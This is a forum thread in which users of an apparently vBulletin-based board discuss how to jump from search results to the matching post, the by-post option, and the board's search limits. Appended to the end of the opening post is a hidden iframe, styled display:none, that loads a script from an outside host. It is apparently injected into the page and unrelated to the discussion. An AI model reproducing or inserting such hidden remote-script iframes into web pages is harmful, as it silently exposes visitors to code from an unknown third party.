+ Reply to Thread

Search function question

Hello!

I was curious about the search function on this site. I have found that it is easy to use to find a match to a thread, but can it be used to navigate directly to the post that matches my query? For example, if I put in a search for "backlit keypad" one of the threads that pops up is the Release Date Rumors/Speculation thread. If I select that thread I may still have to go through over 100 pages of posts to find the match that the search function located. It would be so much easier to have the specific post be linked to my query. Is this possible? Am I missing something really simple? I realize I can run a separate "find" using my browser, but that is still limited to finding the text within the displayed page. The best solution I've found is to maximize the number of posts displayed per page and then use the browser's find command to search in those posts, and then on to the next page.

I apologize for the length, just wanted to be clear about my issue.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I perform the same steps. I think Its about 40 posts per page, but the release thread is still 45 pages!!
    iPhone therefore iAm.

On the search page, you have the option to show results by thread or by post. If you select by post, your results will have the option to jump to the post with the search match....

(did that make sense?)

Alan

Aww crap! I knew I was doing something stupid. Thanks alanb!

Originally posted by JigSawMan
    Aww crap! I knew I was doing something stupid. Thanks alanb!
    I just found that two days ago, when I kept getting hits in multi-page threads and started looking around.

Alan

I always wondered about that but never needed it! Thanks Alan!
    iPhone therefore iAm.

Search results by-post versus by-thread

Originally posted by alanb
    On the search page, you have the option to show results by thread or by post.
    To me, by-thread results extremely aggravating. I wish this board's default had been by-post from the start. There's a reason people keep asking the same questions, and getting lambasted by the senior members all the time: Despite the common sentiment that newbies don't search enough, the fact is that this is *not* a user-friendly site when it comes to searching.
    -- Kevin Andrew Lipscomb
    -- http://kal.webhop.net

Re: Search results by-post versus by-thread

Originally posted by KevinAnLipscomb
    To me, by-thread results extremely aggravating. I wish this board's default had been by-post from the start. There's a reason people keep asking the same questions, and getting lambasted by the senior members all the time: Despite the common sentiment that newbies don't search enough, the fact is that this is *not* a user-friendly site when it comes to searching.
    As one of the members who pesters folks about searching, I actually tend to agree with you. The board has grown so big in just the couple of months I have been here that it is getting harder and harder to get accurate search results. Finding the By Post feature has helped a lot, but I often find that I need to start with just a couple of key words, then narrow my search by either limiting which forums to search or adding keywords.

Alan

Sort by relevance on searches

The other feature that is sorely lacking is the ability to search by relevance, like all the major search engines do.
    -- Kevin Andrew Lipscomb

Search engine limitations

I forgot to mention how much I dislike vBulletin's refusal to search on short keywords, such as SX, KT, etc, all of which are extremely relevant to this board. And, although I'm not sure about this, I doubt you can search for quoted phrases such as "1.1.12".

Can you tell I dislike vBulletin?
    -- Kevin Andrew Lipscomb

Administrator
    use an asterisk for names shorter than 3 characters...